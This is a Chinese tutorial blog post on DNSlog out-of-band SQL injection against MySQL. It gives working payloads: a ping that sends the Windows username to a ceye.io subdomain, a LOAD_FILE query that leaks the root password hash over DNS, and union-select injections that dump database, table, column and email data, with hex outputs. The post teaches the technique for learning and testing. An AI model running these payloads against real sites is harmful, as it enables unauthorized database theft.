当前位置:网站首页>DNSlog外带数据注入
DNSlog外带数据注入
2022-08-05 06:06:00 【树迷了路】
DNSlog
DNS log即DNS日志,域名解析的记录
外带原理
测试平台利用泛解析机制解析域名,并在解析我们构造的子域名时记录,生成日志,只要有解析就数据,我们查看日志即可获取关键数据
MySQL条件
配置文件 mysql.ini 中 secure_file_priv 参数需为空
mysql> show variables like '%secu%';
+------------------+-------+
| Variable_name | Value |
+------------------+-------+
| secure_auth | OFF |
| secure_file_priv | |
+------------------+-------+
2 rows in set (0.00 sec)
CEYE
测试网站
windows
ping %USERNAME%.b182oj.ceye.io
b1820j 换成网站分配的
SQL Injection
MySQL
SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.mysql.ip.port.b182oj.ceye.io\\abc'));
load_file 是MySQL读文件的 函数 ;
\\\\——>\\
编码绕过
有些特殊字符在网站中是不合规代码,如user() 中的 @ ;
转十六进制即可;
如下实际为构造域名:\\user().aueuhs.ceye.io\\abc
?id=-1' union select 1,load_file(concat('\\\\',hex(user()),'.aueuhs.ceye.io\\abc')),3--+
726F6F74406C6F63616C686F7374 |
查数据库
?id=-1' union select 1,load_file(concat('\\\\',database(),'.aueuhs.ceye.io\\abc')),3--+
CEYE以将数据带入;
查表
?id=-1' union select 1,load_file(concat('\\\\',hex((select group_concat(table_name) from information_schema.tables where table_schema="security")),'.aueuhs.ceye.io\\abc')),3--+
656D61696C732C72656665726572732C756167656E74732C7573657273 |
查字段名
?id=-1' union select 1,load_file(concat('\\\\',hex((select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="emails")),'.aueuhs.ceye.io\\abc')),3--+
69642C656D61696C5F6964 |
查数据
?id=-1' union select 1,load_file(concat('\\\\',hex((select concat(id,0x3e,email_id) from security.emails limit 0,1)),'.aueuhs.ceye.io\\abc')),3--+
313E44756D62406468616B6B616E2E636F6D |
边栏推荐
猜你喜欢
随机推荐
淘宝客APP带自营商城本地生活CPS外卖优惠电影票话费更新渠道跟单生活特权V3
(2022杭电多校六)1012-Loop(单调栈+思维)
AH8669-AC380/VAC220V转降5V12V24V500MA内电源芯片IC方案
关于Antd的Affix突然不好用了,或者Window的scroll监听不好用了
Jenkins详细配置
Email management Filter emails
The NDK compiler so libraries
scikit-image图像处理笔记
字体样式及其分类
Writing OpenCV in VSCode
LabVIEW中如何实现任意形状的不规则按键
超简单的白鹭egret项目添加图片详细教程
合工大苍穹战队视觉组培训Day9——相机标定
document.querySelector()方法
cs231n learning record
Quick Start to Drools Rule Engine (1)
docker部署完mysql无法连接
typescript62-泛型工具类型(record)
cs231n学习记录
更改小程序原生radio的颜色及大小